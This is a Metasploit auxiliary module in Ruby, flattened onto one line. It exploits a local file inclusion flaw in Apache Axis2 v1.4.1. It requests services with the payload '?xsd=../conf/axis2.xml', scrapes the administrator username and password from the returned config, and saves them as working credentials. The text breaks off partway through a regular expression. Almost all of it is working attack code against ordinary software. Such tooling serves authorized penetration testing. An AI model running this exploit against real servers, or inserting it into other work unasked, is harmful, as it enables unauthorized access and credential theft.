## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Apache Axis2 v1.4.1 Local File Inclusion', 'Description' => %q{ This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially recover authentication credentials to Axis services. }, 'References' => [ ['EDB', '12721'], ['OSVDB', '59001'], ], 'Author' => [ 'Tiago Ferreira ' ], 'License' => MSF_LICENSE ) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']), ]) end def run_host(ip) uri = normalize_uri(target_uri.path) begin res = send_request_raw({ 'method' => 'GET', 'uri' => uri, }, 25) if (res and res.code == 200) res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/) new_uri = normalize_uri("/axis2/services/#{$1}") get_credentials(new_uri) else print_status("#{full_uri} - Apache Axis - The remote page not accessible") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: (ssl ? 'https' : 'http'), protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def get_credentials(uri) lfi_payload = "?xsd=../conf/axis2.xml" begin res = send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}" + lfi_payload, }, 25) print_status("#{full_uri} - Apache Axis - Dumping administrative credentials") if res.nil? print_error("#{full_uri} - Connection timed out") return end if (res.code == 200) if res.body.to_s.match(/axisconfig/) res.body.scan(/parameter\sname=\"userName\">([^\s]+)([^\s]+)